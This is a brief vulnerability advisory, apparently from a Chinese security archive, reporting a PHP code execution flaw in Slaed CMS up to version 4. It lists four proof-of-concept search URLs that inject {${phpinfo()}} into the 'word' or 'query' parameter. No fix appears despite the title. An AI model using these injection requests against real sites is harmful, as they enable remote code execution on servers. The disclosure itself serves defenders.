Slaed CMS code execution flaws and fixes-vulnerability warning-the black bar safety net

2011-09-14T00:00:00
ID MYHACK58:62201131835
Type myhack58
Reporter 佚名
Modified 2011-09-14T00:00:00

Description

Title: Slaed CMS Code exec

Author: brain[pillow]

Download address: <http://slaed.net/>

Test platform: OpenSlaed 1.2 (free), Slaed CMS <= 4.*

On different versions of this software next vulnerabilities are availible:

www.badguest.cn/index.php?name=Search&mod=&word={${phpinfo()}}&query=ok&to=view

/index. php? name=Search&mod=&word=ok&query={${phpinfo()}}&to=view

OR:

/search. html? mod=&word={${phpinfo()}}&query=ok&to=view

/search. html? mod=&word=ok&query={${phpinfo()}}&to=view